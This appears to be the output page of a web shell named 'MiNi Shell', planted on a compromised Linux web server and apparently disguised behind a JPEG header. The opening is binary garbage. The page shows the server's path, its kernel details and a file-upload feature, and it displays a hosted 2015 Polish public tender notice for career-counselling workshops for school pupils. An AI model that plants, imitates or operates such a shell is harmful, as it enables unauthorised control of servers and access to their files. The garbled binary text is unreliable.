JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151204/331742-N-2015.html

<p class="kh_header"><b>Zator: Zorganizowanie i wykonanie usługi szkoleniowej polegającej na przeprowadzeniu grupowego doradztwa zawodowego dla uczniów szkół gimnazjalnych znajdujących się na terenie Gmin biorących udział w Projekcie KIK/14 pn.: Dolina Karpia - szansa na przyszłość.
Nr procedury ZAR/P/2/2015</b><br>
<b>Numer ogłoszenia: 331742 - 2015; data zamieszczenia: 04.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zatorska Agencja Rozwoju Sp. z o.o. , ul. Juliusza Słowackiego 15, 32-640 Zator, woj. małopolskie, tel. 795 391 008.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.caz.zator.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i wykonanie usługi szkoleniowej polegającej na przeprowadzeniu grupowego doradztwa zawodowego dla uczniów szkół gimnazjalnych znajdujących się na terenie Gmin biorących udział w Projekcie KIK/14 pn.: Dolina Karpia - szansa na przyszłość.
Nr procedury ZAR/P/2/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zorganizowanie i wykonanie usługi szkoleniowej polegającej na przeprowadzeniu grupowego doradztwa zawodowego dla uczniów szkół gimnazjalnych znajdujących się na terenie Gmin biorących udział w Projekcie KIK/14 pn.: Dolina Karpia - szansa na przyszłość. tj. Gmin: Zator, Osiek, Brzeźnica, Polanka Wielka, Przeciszów. 
2.	Planowana liczba szkoleń/doradztwa: 100 (liczba ta może ulec zmniejszeniu).
Zamawiający w porozumieniu ze szkołami określają terminy szkoleń/doradztwa ewentualne dni i godziny, w których mogą odbyć się szkolenia/doradztwo. Szkoły wybierają tematy doradztwa/szkolenia  określone w pkt. 5.
3.	Zajęcia prowadzone będą w godzinach oraz dniach nauki szkolnej.   
4.	Zajęcie będą się odbywać w szkołach wskazanych przez Zamawiającego (na terenie Gmin: Zator, Przeciszów, Osiek, Polanka Wielka, Brzeźnica).
5.	Tematyka doradztwa/szkolenia (Krótka charakterystyka):
5.1.	Zainteresowania  jako baza do planowania drogi edukacyjnej oraz wyboru szkoły średniej
	(Zapoznanie uczniów z rodzajem szkół ponadgimnazjalnych (Liceum Ogólnokształcące, Technikum, Szkoła Zawodowa) oraz profilami nauczania. Pomoc w dopasowaniu zainteresowań, umiejętności oraz predyspozycji indywidualnych uczniów do  danego rodzaju szkoły oraz wskazania dalszych możliwości edukacyjnych. Przedstawienie wad i zalet danego profilu klasy oraz szkoły). 
5.2.	Poznawanie zawodów oraz odkrywanie własnych umiejętności i możliwości - planowanie kariery zawodowej
	(Zapoznanie uczniów z zawodami oraz ich specyfiką, ze wskazaniem trendów oraz zapotrzebowania na rynku pracy. Odkrywanie mocnych stron: umiejętności, wiedza, zalety osobiste, zdolności.
Wzrost samoświadomości własnych predyspozycji osobowościowych, wyznawanych wartości, preferowanych stylów pracy. Określenie nowych możliwości zawodowych, wzmacnianie poczucia własnej wartości, budowanie wiary we własne możliwości. Przeprowadzenie testów predyspozycji zawodowych). 
5.3.	Przygotowanie  pierwszych dokumentów aplikacyjnych - rozmowa kwalifikacyjna. Zatrudnienie pracowników młodocianych - praca wakacyjna
	(Zapoznanie z zasadami tworzenia dokumentów aplikacyjnych tj. listu motywacyjnego oraz życiorysu. Zapoznanie z zasadami i sposobami przeprowadzania rozmów kwalifikacyjnych. Przybliżenie zagadnień związanych z poszukiwaniem pracy wakacyjnej. 
Omówienie praw pracowników młodocianych, umów zawieranych między pracownikiem młodocianym 
a pracodawcą). 
5.4.	Autoprezentacja, sposoby radzenia sobie ze stresem	(Wdrożenie lub utrwalenie profesjonalnych form autoprezentacji. Warsztaty praktyczne  przy wykorzystaniu kamery rejestrującej. Autoprezentacja ucznia jest nagrywana, następnie odtwarzana, dzięki czemu,  uczeń  z pomocą osoby prowadzącej może  dokonać samooceny swoich umiejętności, nabytych podczas szkolenia. Omówienie zagadnień  dotyczących mowy ciała i sposobów radzenia sobie ze stresem. Warsztaty mają na celu nauczenie uczniów kreowania własnego wizerunku). 
5.5.	Warsztaty z  przedsiębiorczości - prowadzone z wykorzystaniem gry edukacyjnej np. Cashflow, Chłopska Szkoła Biznesu lub inna	(Wykorzystanie na zajęciach gry edukacyjnej, która poprzez zabawę, wprowadza uczniów w świat finansów i rachunkowości. Wyjaśnienie zasad gry,  omówienie fachowych pojęć pojawiających się w grze.  Uczniowie zostają podzieleni na grupy, grają w grę. Samodzielnie  podejmując decyzje, uczą się kreatywnego myślenia).
5.6.	Przedsiębiorczość i finanse dla młodzieży	(Przedstawienie podstawowych kwestii związanych z pieniędzmi: jak zarobić pieniądze, jak nimi dysponować oraz jak je inwestować. Zapoznanie uczniów z podstawowymi zagadnieniami rynku finansowego). 
5.7.	Samopoznanie w sferze zawodowej, mocne i słabe strony 	(Pomoc  w odkrywaniu własnego potencjału przez uczniów. Analiza silnych stron, talentów, pasji, marzeń, wartości, wyznaczanie osobistych celów  pod kątem planowania kariery zawodowej. Praca nad zwiększeniem wewnętrznej motywacji). 
8.	Techniki kreatywnego myślenia - warsztaty. 	(Zajęcia mają na celu zaznajomienie z problematyką twórczego rozwiązywania problemów przy wykorzystaniu określonych technik. Poznanie technik twórczego myślenia oraz zasad ich zastosowania. Przekazanie wiedzy teoretycznej i praktycznej w zakresie twórczego rozwiązywania problemów, rozwijanie umiejętności pracy w grupach). 

-Jedno szkolenie (doradztwo) składa się  z 2 godzin lekcyjnych oraz z przerwy lekcyjnej.
-Grupa  szkoleniowa obejmuje maksymalnie 30 uczniów.
-Koszt jednego szkolenia (doradztwa) obejmuje: niezbędne materiały dydaktyczne, dojazd do danej szkoły oraz przeprowadzenie zajęć.
-Wykonawca przygotuje i przedstawi do akceptacji szczegółowy program planowanych zajęć.
-Wykonawca będzie zobowiązany do prowadzenia list obecności na zajęciach, które muszą być oznaczone zgodnie zasadami promocji  Szwajcarsko Polskiego Programu Współpracy - SPPW.
-Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metoda e-learningu, w formie eksternistycznej itp.
-Wykonawca zapewnia kamerę wideo, niezbędną do przeprowadzenia zajęć  p.n.: Autoprezentacja, sposoby radzenia sobie ze stresem. Niedopuszczalne jest nagrywanie autoprezentacji za pomocą  urządzeń telekomunikacyjnych (telefon komórkowy, tablet). 
-Wykonawca przeprowadzi warsztaty z przedsiębiorczości w oparciu o grę edukacyjną, zapewniając odpowiednią ilość jej egzemplarzy, co pozwoli na  aktywny udział w zajęciach każdego uczestnika (grupa max. 30 uczniów). 
-Wykonawca przygotowuje dokumentację fotograficzną z każdych przeprowadzonych zajęć.
-Prowadzący zajęcia bierze pełną odpowiedzialność za bezpieczeństwo powierzonej mu młodzieży.
-W oparciu o ustawę z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz.U z 2014r.poz. 1182 z p.zm. ) wszelkie materiały zawierające dane osobowe (lista obecności, nagrania video, zdjęcia), muszą być bezpośrednio po zakończonym szkoleniu/doradztwie dostarczone do Zamawiającego. Wykonawca zobowiązuje się do  trwałego usunięcia powyższych danych  z nośników elektronicznych. Nie dopuszcza się powielania w/w materiałów i przetwarzania przez Wykonawcę. 
6.	Szkolenia (doradztwo) zostaną zrealizowane w ramach Projektu KIK/14 pn.: Dolina Karpia - szansa na przyszłość. Partnerski Program Aktywizacji Społeczno - Gospodarczej i Promocji Przedsiębiorczości realizowany poprzez zastosowanie komplementarnych instrumentów pobudzających regionalny rynek pracy, wzmocnienie podmiotów gospodarczych oraz wykorzystanie lokalnych produktów w celu poprawy jakości życia na obszarach wiejskich. Projekt współfinansowany przez Szwajcarię w ramach szwajcarskiego programu współpracy z nowymi krajami członkowskimi Unii Europejskiej.
7.	Do przeprowadzenia szkolenia(doradztwa), które jest przedmiotem zamówienia Wykonawca musi zapewnić kadrę szkoleniową uprawnioną do prowadzenia zajęć tj.:
-Zajęcia p.n. Zainteresowania  jako baza do planowania drogi edukacyjnej oraz wyboru szkoły średniej oraz Poznawanie zawodów oraz odkrywanie własnych umiejętności 
i możliwości - planowanie kariery zawodowej  muszą być przeprowadzone przez doradcę zawodowego, który w ciągu ostatniego roku przepracował co najmniej 30 godzin jako doradca zawodowy. Doradca zawodowy musi posiadać wykształcenie wyższe z zakresu   doradztwo zawodowego  albo studia podyplomowe zakresu doradztwa zawodowego.
Wszystkie szkolenia(doradztwa) muszą być prowadzone przez osobę, która w ciągu ostatniego roku przeprowadziła  co najmniej 30 godz. szkoleń/ doradztwa.  
8.	Kod zamówienia w ramach wspólnego słownika zamówień (CPV): Usługi szkolenia w dziedzinie rozwoju osobistego - 805 700 00 - 0.
9.	Cena za jedno szkolenie/doradztwo będzie obowiązywać przez cały okres obowiązywania umowy.
10.	Podane w opisach przedmiotu zamówienia nazwy własne, typy, symbole, nazwy handlowe itp. mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych Zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełniania tego samego poziomu jakościowego, merytorycznego oraz gwarantujące taką samą funkcjonalność jak produkty opisane w przedmiocie zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy zapewnią kamerę wideo, niezbędną do przeprowadzenia zajęć  p.n.: Autoprezentacja, sposoby radzenia sobie ze stresem. Niedopuszczalne jest nagrywanie autoprezentacji za pomocą  urządzeń telekomunikacyjnych (telefon komórkowy, tablet) oraz wykonawca przeprowadzając warsztaty z przedsiębiorczości w oparciu o grę edukacyjną, zapewni odpowiednią ilość jej egzemplarzy, co pozwoli na  aktywny udział w zajęciach każdego uczestnika (grupa max. 30 uczniów).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy zapewnią kadrę szkoleniową uprawnioną do prowadzenia zajęć tj.:
-Zajęcia p.n. Zainteresowania  jako baza do planowania drogi edukacyjnej oraz wyboru szkoły średniej oraz Poznawanie zawodów oraz odkrywanie własnych umiejętności i możliwości - planowanie kariery zawodowej  muszą być przeprowadzone przez doradcę zawodowego, który w ciągu ostatniego roku przepracował co najmniej 30 godzin jako doradca zawodowy. Doradca zawodowy musi posiadać wykształcenie wyższe z zakresu doradztwa zawodowego  albo studia podyplomowe zakresu doradztwa zawodowego. 
Wykonawca zobowiązany jest dołączyć do składanej oferty, dokumenty potwierdzające wykształcenie i doświadczenie, osoby prowadzącej zajęcia.
-Wszystkie zajęcia muszą być prowadzone przez osobę, która w ciągu ostatniego roku przeprowadziła  co najmniej 30 godz. szkoleń/doradztwa. Wykonawca zobowiązany jest dołączyć do składanej oferty, dokumenty potwierdzające doświadczenie osoby prowadzącej zajęcia.III.3.5) Sytuacja ekonomiczna i finansowa</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oświadczenie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 z późn. zm.) według załącznika nr 2 do niniejszej specyfikacji. 
2.	Oświadczenie z art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych
(tekst jedn. Dz. U. z 2013 r., poz. 907 z późn. zm.) według załącznika nr 3 do niniejszej specyfikacji.
3.	Oświadczenie z art. 24 ust.2 pkt.5 i art. 26 ust.2 pkt 2d ustawy z dnia  29 stycznia 2004r.                           Prawo zamówień publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 z późn. zm.)według załącznika nr 3a do niniejszej specyfikacji.
4.	Zatwierdzony parafką/podpisem szczegółowy program przeprowadzenia grupowego doradztwa zawodowego dla uczniów szkół gimnazjalnych znajdujących się na terenie Gmin biorących udział w Projekcie KIK/14 pn.: Dolina Karpia- szansa na przyszłość. tj. Gmin: Zator, Osiek, Brzeźnica, Polanka Wielka, Przeciszów, według załącznika nr 4 do niniejszej specyfikacji.    
5.	Oświadczenie o prawie do dysponowania  sprzętem technicznym, niezbędnym do przeprowadzenia grupowego doradztwa zawodowego dla uczniów szkół gimnazjalnych znajdujących się na terenie Gmin biorących udział w Projekcie KIK/14 pn.: Dolina Karpia- szansa na przyszłość. tj. Gmin: Zator, Osiek, Brzeźnica, Polanka Wielka, Przeciszów, według załącznika nr 5 do niniejszej specyfikacji.	
6.	Wykaz kadry szkoleniowej według załącznika nr 6 do niniejszej specyfikacji wraz z oświadczeniem potwierdzającym, że wskazana kadra posiada wymagane przepisami uprawnienia do prowadzenia szkolenia/doradztwa będącego przedmiotem zamówienia. 
7.	Wykaz doradców zawodowych według załącznika nr 7 do niniejszej specyfikacji realizujących grupowe doradztwo zawodowe będące przedmiotem zamówienia wraz z dokumentami potwierdzającymi ilość godzin przepracowanych jako doradca zawodowy. 
8.	Wykaz kadry szkoleniowej według załącznika nr 8 do niniejszej specyfikacji realizujących grupowe doradztwo zawodowe będące przedmiotem zamówienia wraz z dokumentami potwierdzającymi ilość godzin przeprowadzonych szkoleń/doradztwa  w ciągu ostatniego roku. 
9.	Zatwierdzony Parafą/podpisem wzór listy obecności według załącznika nr 9
10.	Wykonawca ma dołączyć potwierdzoną za zgodność z oryginałem kserokopię dokumentu potwierdzającego jakość świadczonych usług szkoleniowych - certyfikat jakości ISO.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Posiadanie certyfikatu jakości usług ISO - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę istotnych postanowień zawartej umowy, dotyczących terminu wykonania umowy, 
terminów płatności, zmiany kadry szkoleniowej w przypadku wystąpienia zdarzeń losowych oraz innych 
postanowień umowy, w uzasadnionych przypadkach za zgodą Zamawiającego, a także dotyczących 
innych zmian korzystnych dla Zamawiającego, aneksem do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.caz.zator.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zatorska Agencja Rozwoju Sp. z o.o., 
ul. Juliusza Słowackiego 15, 
32-640 Zator..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2015 godzina 12:00, miejsce: Zatorskiej Agencji Rozwoju Sp. z o.o., ul. Juliusza Słowackiego 15, 32-640 Zator 
Pokój 2.05 (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Szwajcarię  w ramach Szwajcarsko Polskiego Programu Współpracy z nowymi krajami członkowskimi Unii Europejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com